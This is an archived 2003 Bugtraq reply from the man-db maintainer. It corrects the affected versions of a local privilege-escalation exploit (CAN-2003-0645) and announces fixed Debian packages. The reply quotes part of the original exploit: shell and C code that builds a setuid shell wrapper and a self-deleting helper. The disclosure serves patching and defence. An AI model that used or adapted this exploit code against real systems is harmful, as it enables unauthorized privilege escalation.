| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 08 Aug 2003 11:19:07 +0100
From: Colin Watson <cjwatson@...ian.org>
To: bugtraq@...urityfocus.com
Subject: Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit.
In article <20030806082358.2564.qmail@....securityfocus.com>, Vade 79 wrote:
># man-db[v2.4.1-]: local uid=man exploit.
Correction: 2.3.12 (a beta release) and 2.3.18 to 2.4.1.
>echo "[*] making runme, and mansh source files..."
>cat <<EOF>runme.c
>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <sys/types.h>
>#include <sys/stat.h>
>int main(int argc,char **argv){
> setreuid(geteuid(),geteuid());
> system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh");
> chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
> unlink(argv[0]);
> exit(0);
>}
>EOF
>cat <<EOF>mansh.c
>#include <stdio.h>
>#include <sys/types.h>
>#include <unistd.h>
>int main(){
> setreuid(geteuid(),geteuid());
> execl("/bin/sh","sh",0);
> exit(0);
>}
>EOF
It can be done with a lot less effort and in about a tenth of the space
without resorting to compiled code, but I'll leave that as an exercise
for the reader ... :-)
Anyway, Debian man-db 2.3.20-18.woody.2 (stable) and 2.4.1-12 (unstable)
fix this. I'm working to release 2.4.2 as well. This is CAN-2003-0645.
--
Colin Watson [cjwatson@...ian.org]
Powered by blists - more mailing lists